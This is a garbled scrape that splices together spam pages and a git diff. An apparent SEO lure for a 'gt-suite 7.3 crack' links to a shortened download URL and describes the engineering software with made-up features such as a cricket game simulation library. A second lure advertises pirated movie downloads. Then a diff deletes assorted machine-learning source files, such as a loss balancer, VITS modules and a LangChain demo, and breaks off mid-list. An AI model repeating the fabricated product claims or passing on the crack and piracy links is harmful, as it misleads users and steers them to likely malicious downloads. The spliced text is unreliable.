      GT-SUITE is the industry-leading simulation tool with capabilities and libraries aimed at a wide variety of applications and industries. It offers engineers functionalities ranging from fast concept design to detailed system or sub-system/component analyses, design optimization, and root cause investigation[^2^].

      -

      GT-SUITE 7.3 is the latest release of this software, which was launched in March 2023. It includes many new features and improvements, such as:

      -

      gt-suite 7.3 crack


      Download >>> https://urloso.com/2uyRgy



      -
        -
      • Enhanced multi-physics modeling with built-in 3D CFD and 3D FE (thermal and structural) capabilities
      • -
      • Improved productivity tools and user interface
      • -
      • Expanded libraries for electric and electromagnetic devices, chemistry, acoustics, and controls
      • -
      • New applications for exhaust aftertreatment systems (Exothermia suite), motor design and analysis (FEMAG), and cricket game simulation (Cricket library)
      • -
      -

      GT-SUITE 7.3 can be used for a wide range of engine and vehicle systems, such as:

      -
        -
      • Internal combustion engines (spark ignition, compression ignition, dual fuel, etc.)
      • -
      • Hybrid and electric powertrains
      • -
      • Transmission and driveline systems
      • -
      • Thermal management and cooling systems
      • -
      • Fuel injection and combustion systems
      • -
      • Turbocharging and supercharging systems
      • -
      • EGR concepts and variable geometry systems
      • -
      • VVT and camless valve actuation systems
      • -
      • Aftertreatment systems (DOC, DPF, SCR, etc.)
      • -
      • NVH and sound quality analysis
      • -
      • Vehicle dynamics and handling
      • -
      • Aerodynamics and drag reduction
      • -
      • Cricket game simulation (Indian Premier League matches)
      • -
      -

      GT-SUITE 7.3 is available for download from the Gamma Technologies website[^3^]. Users can also access supplemental material such as tutorials, examples, and documents from the same website. GT-SUITE is compatible with MATLAB and Simulink, which allows users to integrate their models with other tools and workflows[^4^]. GT-SUITE is supported on Windows, Linux, and Mac platforms.

      -

GT-SUITE is used worldwide by all major engine manufacturers and their suppliers. It is also widely adopted by academic institutions and research organizations for teaching and research purposes. GT-SUITE has a large and active user community that provides feedback and suggestions for future development. Gamma Technologies also offers training courses, technical support, consulting services, and custom development for GT-SUITE users.

      - -

GT-SUITE is built on a versatile multi-physics platform that lets users construct models of general systems from many underlying fundamental libraries. Users can seamlessly adjust model fidelity from 0D to 3D calculations, depending on the task and the available computational resources. Users can also import solid models from CAD to create 1D and 3D models, and perform embedded 3D CFD and 3D FE modeling with all boundary conditions provided by the complete surrounding system being simulated.

      -

      -

      GT-SUITE has a fast solver that makes simulations of large and complex systems practical. It also supports distributed computing, which enables users to run multiple simulations in parallel on different machines. GT-SUITE also provides tools for design of experiments (DOE) and optimization, which help users to explore the design space and find optimal solutions. GT-SUITE can also interface with other software tools for data analysis, visualization, and post-processing.

      -
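To make the design-of-experiments idea concrete, here is a minimal sketch of a full-factorial parameter sweep in plain Python. It only illustrates the general concept of enumerating a design space and generating independent cases; the parameter names and the `run_case` stub are hypothetical placeholders and do not represent GT-SUITE's actual scripting interface.

```python
# Minimal full-factorial DOE sketch (illustrative only, not GT-SUITE's API).
from itertools import product

def run_case(bore_mm, compression_ratio):
    # Hypothetical placeholder: in practice this would launch one simulation run,
    # e.g. by writing a case file and submitting it to a solver or job queue.
    return {"bore_mm": bore_mm, "compression_ratio": compression_ratio, "status": "queued"}

bore_values = [80.0, 84.0, 88.0]        # mm
compression_ratios = [9.5, 10.5, 11.5]

# Each combination of factor levels is one independent case, so the cases
# could be dispatched in parallel across different machines.
cases = [run_case(b, cr) for b, cr in product(bore_values, compression_ratios)]
print(f"Generated {len(cases)} DOE cases")
```

A full-factorial sweep like this grows combinatorially with the number of factors, which is why dedicated DOE and optimization tooling typically adds sparser sampling schemes and automated post-processing of the results.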

      GT-SUITE is constantly evolving to meet the needs and challenges of the industry. Gamma Technologies collaborates with leading OEMs, suppliers, and research institutions to develop new features and applications for GT-SUITE. Gamma Technologies also organizes annual user conferences and workshops around the world, where users can learn about the latest developments, share their experiences, and network with other GT-SUITE users.

      d5da3c52bf
      -
      -
      \ No newline at end of file diff --git a/spaces/bioriAsaeru/text-to-voice/HD Online Player (Main Hoon Surya SINGHAM II 720p).md b/spaces/bioriAsaeru/text-to-voice/HD Online Player (Main Hoon Surya SINGHAM II 720p).md deleted file mode 100644 index 149cc641fdb96b47e5d6d93e8426b9a571a959ac..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/HD Online Player (Main Hoon Surya SINGHAM II 720p).md +++ /dev/null @@ -1,10 +0,0 @@ -

      HD Online Player (Main Hoon Surya SINGHAM II 720p)


      Download ✶✶✶ https://urloso.com/2uyOAy



      -
      -Suriya Movies: Stream latest Surya movies, Suriya Tamil movies along with trailers on MX Player in full HD.. Main Hoon Surya Singham 2 (Hindi Dubbed). - -Main Hoon Surya Singham 2 Hindi Dubbed Suriya Movies 2017: Download Surya movies. Download latest Suriya movies in High quality. Suriya Movies in HD Mp4 and Mp3. Main Hoon Surya Singham 2 (Hindi Dubbed). - -Main Hoon Surya Singham 2 Hindi Dubbed Suriya Movies 2017: Download Surya movies. Download 4fefd39f24
      -
      -
      -

      diff --git a/spaces/brainblow/AudioCreator_Music-Audio_Generation/audiocraft/losses/balancer.py b/spaces/brainblow/AudioCreator_Music-Audio_Generation/audiocraft/losses/balancer.py deleted file mode 100644 index 8a0ac8adebab8cdee8f82351965195dc02800d18..0000000000000000000000000000000000000000 --- a/spaces/brainblow/AudioCreator_Music-Audio_Generation/audiocraft/losses/balancer.py +++ /dev/null @@ -1,136 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import typing as tp - -import flashy -import torch -from torch import autograd - - -class Balancer: - """Loss balancer. - - The loss balancer combines losses together to compute gradients for the backward. - Given `y = f(...)`, and a number of losses `l1(y, ...)`, `l2(y, ...)`, with `...` - not having any dependence on `f`, the balancer can efficiently normalize the partial gradients - `d l1 / d y`, `d l2 / dy` before summing them in order to achieve a desired ratio between - the losses. For instance if `weights = {'l1': 2, 'l2': 1}`, 66% of the gradient - going into `f(...)` will come from `l1` on average, and 33% from `l2`. This allows for an easy - interpration of the weights even if the intrisic scale of `l1`, `l2` ... is unknown. - - Noting `g1 = d l1 / dy`, etc., the balanced gradient `G` will be - (with `avg` an exponential moving average over the updates), - - G = sum_i total_norm * g_i / avg(||g_i||) * w_i / sum(w_i) - - If `balance_grads` is False, this is deactivated, and instead the gradient will just be the - standard sum of the partial gradients with the given weights. - - A call to the backward method of the balancer will compute the the partial gradients, - combining all the losses and potentially rescaling the gradients, - which can help stabilize the training and reason about multiple losses with varying scales. - The obtained gradient with respect to `y` is then back-propagated to `f(...)`. - - Expected usage: - - weights = {'loss_a': 1, 'loss_b': 4} - balancer = Balancer(weights, ...) - losses: dict = {} - losses['loss_a'] = compute_loss_a(x, y) - losses['loss_b'] = compute_loss_b(x, y) - if model.training(): - effective_loss = balancer.backward(losses, x) - - Args: - weights (dict[str, float]): Weight coefficient for each loss. The balancer expect the losses keys - from the backward method to match the weights keys to assign weight to each of the provided loss. - balance_grads (bool): Whether to rescale gradients so that weights reflect the fraction of the - overall gradient, rather than a constant multiplier. - total_norm (float): Reference norm when rescaling gradients, ignored otherwise. - emay_decay (float): EMA decay for averaging the norms. - per_batch_item (bool): Whether to compute the averaged norm per batch item or not. This only holds - when rescaling the gradients. - epsilon (float): Epsilon value for numerical stability. - monitor (bool): If True, stores in `self.metrics` the relative ratio between the norm of the gradients - coming from each loss, when calling `backward()`. - """ - def __init__(self, weights: tp.Dict[str, float], balance_grads: bool = True, total_norm: float = 1., - ema_decay: float = 0.999, per_batch_item: bool = True, epsilon: float = 1e-12, - monitor: bool = False): - self.weights = weights - self.per_batch_item = per_batch_item - self.total_norm = total_norm or 1. - self.averager = flashy.averager(ema_decay or 1.) 
- self.epsilon = epsilon - self.monitor = monitor - self.balance_grads = balance_grads - self._metrics: tp.Dict[str, tp.Any] = {} - - @property - def metrics(self): - return self._metrics - - def backward(self, losses: tp.Dict[str, torch.Tensor], input: torch.Tensor) -> torch.Tensor: - """Compute the backward and return the effective train loss, e.g. the loss obtained from - computing the effective weights. If `balance_grads` is True, the effective weights - are the one that needs to be applied to each gradient to respect the desired relative - scale of gradients coming from each loss. - - Args: - losses (Dict[str, torch.Tensor]): dictionary with the same keys as `self.weights`. - input (torch.Tensor): the input of the losses, typically the output of the model. - This should be the single point of dependence between the losses - and the model being trained. - """ - norms = {} - grads = {} - for name, loss in losses.items(): - # Compute partial derivative of the less with respect to the input. - grad, = autograd.grad(loss, [input], retain_graph=True) - if self.per_batch_item: - # We do not average the gradient over the batch dimension. - dims = tuple(range(1, grad.dim())) - norm = grad.norm(dim=dims, p=2).mean() - else: - norm = grad.norm(p=2) - norms[name] = norm - grads[name] = grad - - count = 1 - if self.per_batch_item: - count = len(grad) - # Average norms across workers. Theoretically we should average the - # squared norm, then take the sqrt, but it worked fine like that. - avg_norms = flashy.distrib.average_metrics(self.averager(norms), count) - # We approximate the total norm of the gradient as the sums of the norms. - # Obviously this can be very incorrect if all gradients are aligned, but it works fine. - total = sum(avg_norms.values()) - - self._metrics = {} - if self.monitor: - # Store the ratio of the total gradient represented by each loss. - for k, v in avg_norms.items(): - self._metrics[f'ratio_{k}'] = v / total - - total_weights = sum([self.weights[k] for k in avg_norms]) - assert total_weights > 0. - desired_ratios = {k: w / total_weights for k, w in self.weights.items()} - - out_grad = torch.zeros_like(input) - effective_loss = torch.tensor(0., device=input.device, dtype=input.dtype) - for name, avg_norm in avg_norms.items(): - if self.balance_grads: - # g_balanced = g / avg(||g||) * total_norm * desired_ratio - scale = desired_ratios[name] * self.total_norm / (self.epsilon + avg_norm) - else: - # We just do regular weighted sum of the gradients. - scale = self.weights[name] - out_grad.add_(grads[name], alpha=scale) - effective_loss += scale * losses[name].detach() - # Send the computed partial derivative with respect to the output of the model to the model. 
- input.backward(out_grad) - return effective_loss diff --git a/spaces/caliex/Comparison-of-Manifold-Learning-methods/README.md b/spaces/caliex/Comparison-of-Manifold-Learning-methods/README.md deleted file mode 100644 index 03bf7e5b5be4e09e2ca7eda5f0ff95d12d0ffa13..0000000000000000000000000000000000000000 --- a/spaces/caliex/Comparison-of-Manifold-Learning-methods/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Comparison Of Manifold Learning Methods -emoji: 🤗 -colorFrom: gray -colorTo: red -sdk: gradio -sdk_version: 3.29.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/cc1799/vits-uma-genshin-honkai/modules.py b/spaces/cc1799/vits-uma-genshin-honkai/modules.py deleted file mode 100644 index 56ea4145eddf19dd330a3a41ab0183efc1686d83..0000000000000000000000000000000000000000 --- a/spaces/cc1799/vits-uma-genshin-honkai/modules.py +++ /dev/null @@ -1,388 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm - -import commons -from commons import init_weights, get_padding -from transforms import piecewise_rational_quadratic_transform - - -LRELU_SLOPE = 0.1 - - -class LayerNorm(nn.Module): - def __init__(self, channels, eps=1e-5): - super().__init__() - self.channels = channels - self.eps = eps - - self.gamma = nn.Parameter(torch.ones(channels)) - self.beta = nn.Parameter(torch.zeros(channels)) - - def forward(self, x): - x = x.transpose(1, -1) - x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps) - return x.transpose(1, -1) - - -class ConvReluNorm(nn.Module): - def __init__(self, in_channels, hidden_channels, out_channels, kernel_size, n_layers, p_dropout): - super().__init__() - self.in_channels = in_channels - self.hidden_channels = hidden_channels - self.out_channels = out_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - assert n_layers > 1, "Number of layers should be larger than 0." 
- - self.conv_layers = nn.ModuleList() - self.norm_layers = nn.ModuleList() - self.conv_layers.append(nn.Conv1d(in_channels, hidden_channels, kernel_size, padding=kernel_size//2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.relu_drop = nn.Sequential( - nn.ReLU(), - nn.Dropout(p_dropout)) - for _ in range(n_layers-1): - self.conv_layers.append(nn.Conv1d(hidden_channels, hidden_channels, kernel_size, padding=kernel_size//2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask): - x_org = x - for i in range(self.n_layers): - x = self.conv_layers[i](x * x_mask) - x = self.norm_layers[i](x) - x = self.relu_drop(x) - x = x_org + self.proj(x) - return x * x_mask - - -class DDSConv(nn.Module): - """ - Dialted and Depth-Separable Convolution - """ - def __init__(self, channels, kernel_size, n_layers, p_dropout=0.): - super().__init__() - self.channels = channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - - self.drop = nn.Dropout(p_dropout) - self.convs_sep = nn.ModuleList() - self.convs_1x1 = nn.ModuleList() - self.norms_1 = nn.ModuleList() - self.norms_2 = nn.ModuleList() - for i in range(n_layers): - dilation = kernel_size ** i - padding = (kernel_size * dilation - dilation) // 2 - self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size, - groups=channels, dilation=dilation, padding=padding - )) - self.convs_1x1.append(nn.Conv1d(channels, channels, 1)) - self.norms_1.append(LayerNorm(channels)) - self.norms_2.append(LayerNorm(channels)) - - def forward(self, x, x_mask, g=None): - if g is not None: - x = x + g - for i in range(self.n_layers): - y = self.convs_sep[i](x * x_mask) - y = self.norms_1[i](y) - y = F.gelu(y) - y = self.convs_1x1[i](y) - y = self.norms_2[i](y) - y = F.gelu(y) - y = self.drop(y) - x = x + y - return x * x_mask - - -class WN(torch.nn.Module): - def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0): - super(WN, self).__init__() - assert(kernel_size % 2 == 1) - self.hidden_channels =hidden_channels - self.kernel_size = kernel_size, - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.p_dropout = p_dropout - - self.in_layers = torch.nn.ModuleList() - self.res_skip_layers = torch.nn.ModuleList() - self.drop = nn.Dropout(p_dropout) - - if gin_channels != 0: - cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1) - self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight') - - for i in range(n_layers): - dilation = dilation_rate ** i - padding = int((kernel_size * dilation - dilation) / 2) - in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size, - dilation=dilation, padding=padding) - in_layer = torch.nn.utils.weight_norm(in_layer, name='weight') - self.in_layers.append(in_layer) - - # last one is not necessary - if i < n_layers - 1: - res_skip_channels = 2 * hidden_channels - else: - res_skip_channels = hidden_channels - - res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1) - res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight') - self.res_skip_layers.append(res_skip_layer) - - def forward(self, x, x_mask, g=None, **kwargs): - output = torch.zeros_like(x) - n_channels_tensor = torch.IntTensor([self.hidden_channels]) - - if g is not None: - g = self.cond_layer(g) 
- - for i in range(self.n_layers): - x_in = self.in_layers[i](x) - if g is not None: - cond_offset = i * 2 * self.hidden_channels - g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:] - else: - g_l = torch.zeros_like(x_in) - - acts = commons.fused_add_tanh_sigmoid_multiply( - x_in, - g_l, - n_channels_tensor) - acts = self.drop(acts) - - res_skip_acts = self.res_skip_layers[i](acts) - if i < self.n_layers - 1: - res_acts = res_skip_acts[:,:self.hidden_channels,:] - x = (x + res_acts) * x_mask - output = output + res_skip_acts[:,self.hidden_channels:,:] - else: - output = output + res_skip_acts - return output * x_mask - - def remove_weight_norm(self): - if self.gin_channels != 0: - torch.nn.utils.remove_weight_norm(self.cond_layer) - for l in self.in_layers: - torch.nn.utils.remove_weight_norm(l) - for l in self.res_skip_layers: - torch.nn.utils.remove_weight_norm(l) - - -class ResBlock1(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.convs1 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]))) - ]) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))) - ]) - self.convs2.apply(init_weights) - - def forward(self, x, x_mask=None): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c2(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.convs = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))) - ]) - self.convs.apply(init_weights) - - def forward(self, x, x_mask=None): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Log(nn.Module): - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = torch.log(torch.clamp_min(x, 1e-5)) * x_mask - logdet = torch.sum(-y, [1, 2]) - return y, logdet - else: - x = torch.exp(x) * x_mask - return x - - -class Flip(nn.Module): - def forward(self, x, *args, reverse=False, **kwargs): - x = torch.flip(x, [1]) - if not reverse: - logdet = 
torch.zeros(x.size(0)).to(dtype=x.dtype, device=x.device) - return x, logdet - else: - return x - - -class ElementwiseAffine(nn.Module): - def __init__(self, channels): - super().__init__() - self.channels = channels - self.m = nn.Parameter(torch.zeros(channels,1)) - self.logs = nn.Parameter(torch.zeros(channels,1)) - - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = self.m + torch.exp(self.logs) * x - y = y * x_mask - logdet = torch.sum(self.logs * x_mask, [1,2]) - return y, logdet - else: - x = (x - self.m) * torch.exp(-self.logs) * x_mask - return x - - -class ResidualCouplingLayer(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=0, - gin_channels=0, - mean_only=False): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = WN(hidden_channels, kernel_size, dilation_rate, n_layers, p_dropout=p_dropout, gin_channels=gin_channels) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels]*2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels]*2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1,2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x - - -class ConvFlow(nn.Module): - def __init__(self, in_channels, filter_channels, kernel_size, n_layers, num_bins=10, tail_bound=5.0): - super().__init__() - self.in_channels = in_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.num_bins = num_bins - self.tail_bound = tail_bound - self.half_channels = in_channels // 2 - - self.pre = nn.Conv1d(self.half_channels, filter_channels, 1) - self.convs = DDSConv(filter_channels, kernel_size, n_layers, p_dropout=0.) - self.proj = nn.Conv1d(filter_channels, self.half_channels * (num_bins * 3 - 1), 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels]*2, 1) - h = self.pre(x0) - h = self.convs(h, x_mask, g=g) - h = self.proj(h) * x_mask - - b, c, t = x0.shape - h = h.reshape(b, c, -1, t).permute(0, 1, 3, 2) # [b, cx?, t] -> [b, c, t, ?] 
- - unnormalized_widths = h[..., :self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_heights = h[..., self.num_bins:2*self.num_bins] / math.sqrt(self.filter_channels) - unnormalized_derivatives = h[..., 2 * self.num_bins:] - - x1, logabsdet = piecewise_rational_quadratic_transform(x1, - unnormalized_widths, - unnormalized_heights, - unnormalized_derivatives, - inverse=reverse, - tails='linear', - tail_bound=self.tail_bound - ) - - x = torch.cat([x0, x1], 1) * x_mask - logdet = torch.sum(logabsdet * x_mask, [1,2]) - if not reverse: - return x, logdet - else: - return x diff --git a/spaces/chasemcdo/hf_localai/examples/langchain/langchainpy-localai-example/full_demo.py b/spaces/chasemcdo/hf_localai/examples/langchain/langchainpy-localai-example/full_demo.py deleted file mode 100644 index 52271b673c3df896f653c0ef83c62f0c50767375..0000000000000000000000000000000000000000 --- a/spaces/chasemcdo/hf_localai/examples/langchain/langchainpy-localai-example/full_demo.py +++ /dev/null @@ -1,46 +0,0 @@ -import os -import logging - -from langchain.chat_models import ChatOpenAI -from langchain import PromptTemplate, LLMChain -from langchain.prompts.chat import ( - ChatPromptTemplate, - SystemMessagePromptTemplate, - AIMessagePromptTemplate, - HumanMessagePromptTemplate, -) -from langchain.schema import ( - AIMessage, - HumanMessage, - SystemMessage -) - -# This logging incantation makes it easy to see that you're actually reaching your LocalAI instance rather than OpenAI. -logging.basicConfig(level=logging.DEBUG) - -print('Langchain + LocalAI PYTHON Tests') - -base_path = os.environ.get('OPENAI_API_BASE', 'http://api:8080/v1') -key = os.environ.get('OPENAI_API_KEY', '-') -model_name = os.environ.get('MODEL_NAME', 'gpt-3.5-turbo') - - -chat = ChatOpenAI(temperature=0, openai_api_base=base_path, openai_api_key=key, model_name=model_name, max_tokens=100) - -print("Created ChatOpenAI for ", chat.model_name) - -template = "You are a helpful assistant that translates {input_language} to {output_language}. The next message will be a sentence in {input_language}. Respond ONLY with the translation in {output_language}. Do not respond in {input_language}!" 
-system_message_prompt = SystemMessagePromptTemplate.from_template(template) -human_template = "{text}" -human_message_prompt = HumanMessagePromptTemplate.from_template(human_template) - -chat_prompt = ChatPromptTemplate.from_messages([system_message_prompt, human_message_prompt]) - -print("ABOUT to execute") - -# get a chat completion from the formatted messages -response = chat(chat_prompt.format_prompt(input_language="English", output_language="French", text="I love programming.").to_messages()) - -print(response) - -print("."); \ No newline at end of file diff --git a/spaces/chendl/compositional_test/multimodal/playground.py b/spaces/chendl/compositional_test/multimodal/playground.py deleted file mode 100644 index 5601eda90d9759f56b6cefdb7b91129634b6cad4..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/multimodal/playground.py +++ /dev/null @@ -1,11 +0,0 @@ -import os -import json - -if __name__ == "__main__": - blip2_cases = os.listdir("/gpfs/u/home/LMCG/LMCGljnn/scratch/code/multimodal2/blip2_baseline/blip2_fail_case") - kmos2_cases = os.listdir("/gpfs/u/home/LMCG/LMCGljnn/scratch/code/unilm/kosmos-2/kmos2_fail_case") - blip2_failed_ids = set([int(c.split("_")[0]) for c in blip2_cases]) - kmos2_failed_ids = set([int(c.split("_")[0]) for c in kmos2_cases]) - both_failed_ids = list(blip2_failed_ids.intersection(kmos2_failed_ids)) - print(both_failed_ids) - json.dump(both_failed_ids, open("both_failed_ids.json", "w"), indent=1) diff --git a/spaces/chendl/compositional_test/transformers/examples/research_projects/bertabs/configuration_bertabs.py b/spaces/chendl/compositional_test/transformers/examples/research_projects/bertabs/configuration_bertabs.py deleted file mode 100644 index 02b8f27cb30a2a7f9c203dc8084db087086b1e21..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/transformers/examples/research_projects/bertabs/configuration_bertabs.py +++ /dev/null @@ -1,97 +0,0 @@ -# coding=utf-8 -# Copyright 2019 The HuggingFace Inc. team. -# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -""" BertAbs configuration """ -import logging - -from transformers import PretrainedConfig - - -logger = logging.getLogger(__name__) - - -BERTABS_FINETUNED_CONFIG_MAP = { - "bertabs-finetuned-cnndm": "https://huggingface.co/remi/bertabs-finetuned-cnndm-extractive-abstractive-summarization/resolve/main/config.json", -} - - -class BertAbsConfig(PretrainedConfig): - r"""Class to store the configuration of the BertAbs model. - - Arguments: - vocab_size: int - Number of tokens in the vocabulary. - max_pos: int - The maximum sequence length that this model will be used with. - enc_layer: int - The numner of hidden layers in the Transformer encoder. - enc_hidden_size: int - The size of the encoder's layers. - enc_heads: int - The number of attention heads for each attention layer in the encoder. - enc_ff_size: int - The size of the encoder's feed-forward layers. 
- enc_dropout: int - The dropout probability for all fully connected layers in the - embeddings, layers, pooler and also the attention probabilities in - the encoder. - dec_layer: int - The numner of hidden layers in the decoder. - dec_hidden_size: int - The size of the decoder's layers. - dec_heads: int - The number of attention heads for each attention layer in the decoder. - dec_ff_size: int - The size of the decoder's feed-forward layers. - dec_dropout: int - The dropout probability for all fully connected layers in the - embeddings, layers, pooler and also the attention probabilities in - the decoder. - """ - - model_type = "bertabs" - - def __init__( - self, - vocab_size=30522, - max_pos=512, - enc_layers=6, - enc_hidden_size=512, - enc_heads=8, - enc_ff_size=512, - enc_dropout=0.2, - dec_layers=6, - dec_hidden_size=768, - dec_heads=8, - dec_ff_size=2048, - dec_dropout=0.2, - **kwargs, - ): - super().__init__(**kwargs) - - self.vocab_size = vocab_size - self.max_pos = max_pos - - self.enc_layers = enc_layers - self.enc_hidden_size = enc_hidden_size - self.enc_heads = enc_heads - self.enc_ff_size = enc_ff_size - self.enc_dropout = enc_dropout - - self.dec_layers = dec_layers - self.dec_hidden_size = dec_hidden_size - self.dec_heads = dec_heads - self.dec_ff_size = dec_ff_size - self.dec_dropout = dec_dropout diff --git a/spaces/chendl/compositional_test/transformers/src/transformers/generation/__init__.py b/spaces/chendl/compositional_test/transformers/src/transformers/generation/__init__.py deleted file mode 100644 index bf87b6e5ff5fe21b91419c646cf4a3d7f69059bc..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/transformers/src/transformers/generation/__init__.py +++ /dev/null @@ -1,272 +0,0 @@ -# Copyright 2022 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
- -from typing import TYPE_CHECKING - -from ..utils import OptionalDependencyNotAvailable, _LazyModule, is_flax_available, is_tf_available, is_torch_available - - -_import_structure = { - "configuration_utils": ["GenerationConfig"], - "streamers": ["TextIteratorStreamer", "TextStreamer"], -} - -try: - if not is_torch_available(): - raise OptionalDependencyNotAvailable() -except OptionalDependencyNotAvailable: - pass -else: - _import_structure["beam_constraints"] = [ - "Constraint", - "ConstraintListState", - "DisjunctiveConstraint", - "PhrasalConstraint", - ] - _import_structure["beam_search"] = [ - "BeamHypotheses", - "BeamScorer", - "BeamSearchScorer", - "ConstrainedBeamSearchScorer", - ] - _import_structure["logits_process"] = [ - "EpsilonLogitsWarper", - "EtaLogitsWarper", - "ForcedBOSTokenLogitsProcessor", - "ForcedEOSTokenLogitsProcessor", - "HammingDiversityLogitsProcessor", - "InfNanRemoveLogitsProcessor", - "LogitsProcessor", - "LogitsProcessorList", - "LogitsWarper", - "MinLengthLogitsProcessor", - "MinNewTokensLengthLogitsProcessor", - "NoBadWordsLogitsProcessor", - "NoRepeatNGramLogitsProcessor", - "PrefixConstrainedLogitsProcessor", - "RepetitionPenaltyLogitsProcessor", - "EncoderRepetitionPenaltyLogitsProcessor", - "TemperatureLogitsWarper", - "TopKLogitsWarper", - "TopPLogitsWarper", - "TypicalLogitsWarper", - "EncoderNoRepeatNGramLogitsProcessor", - "ExponentialDecayLengthPenalty", - "LogitNormalization", - ] - _import_structure["stopping_criteria"] = [ - "MaxNewTokensCriteria", - "MaxLengthCriteria", - 